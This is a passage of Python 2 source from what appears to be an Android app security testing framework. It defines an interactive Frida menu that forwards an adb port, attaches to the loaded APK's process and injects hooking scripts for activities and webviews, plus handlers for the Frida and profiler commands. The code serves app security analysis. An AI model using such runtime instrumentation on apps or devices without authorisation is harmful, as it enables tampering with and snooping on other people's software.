t.cyan("Enter 'quit' to exit Frida module!")))
print(t.green("[{0}] ".format(datetime.now()) +
t.yellow("Available Frida functions: ") +
"activities, webview"))
function = raw_input(t.green("[{0}] ".format(datetime.now())
+ t.yellow("Enter Frida function: ")))
if function == "quit":
break
try:
if function == "activities":
# adb forward just
# in case
#
Popen("adb forward tcp:27042 tcp:27042", shell=True).wait()
process = frida.get_device_manager().enumerate_devices()[-1].attach(self.apk.get_package())
script = process.create_script(self.do_activities())
script.on('message', self.on_message)
script.load()
sys.stdin.read()
elif function == "webview":
# adb forward just
# in case
#
Popen("adb forward tcp:27042 tcp:27042", shell=True).wait()
process = frida.get_device_manager().enumerate_devices()[-1].attach(self.apk.get_package())
script = process.create_script(self.do_webview())
script.on('message', self.on_message)
script.load()
sys.stdin.read()
except frida.ProcessNotFoundError as e:
print(t.red("[{0}] ".format(datetime.now()) +
"Could not connect to target process!"))
Logger.run_logger(e.message)
except frida.ServerNotRunningError as e:
print(t.red("[{0}] ".format(datetime.now()) +
"The frida-server is not running!"))
Logger.run_logger(e.message)
except frida.TransportError as e:
print(t.red("[{0}] ".format(datetime.now()) +
"Connection was closed!"))
Logger.run_logger(e.message)
except KeyboardInterrupt:
pass
def do_frida(args):
"""
Description: Runs the Frida instrumentation toolkit against a target process
Requirements: Loaded APK
Usage: frida
"""
try:
from framework.brains.dynamic.frida.instrumentation import Instrumentation
if globals()["apk"] is not None:
i = Instrumentation(globals()["apk"])
i.run_instrumentation()
else:
print(t.red("[{0}] ".format(datetime.now())) +
t.white("Module not available"))
print(t.red("[{0}] ".format(datetime.now())) +
t.white("You cannot run the frida module without a loaded APK"))
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Instrumentation"))
Logger.run_logger(e.message)
def do_profiler(args):
"""
Description: Run profiling on the target APK loaded
Requirements: Loaded APK
Usage: profiler
"""
try:
from framework.brains.apk.enumeration.profiler import Profiler
if globals()["apk"] is not None:
p = Profiler(globals()["apk"])
p.run_profiler()
else:
print(t.red("[{0}] ".format(datetime.now())) +
t.white("Module not available"))
print(t.red("[{0}] ".format(datetime.now())) +
t.white("You cannot run the profiler module without a loaded APK"))
except ImportError as e:
print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Profiler"))
Logger.run_logger(e.message)
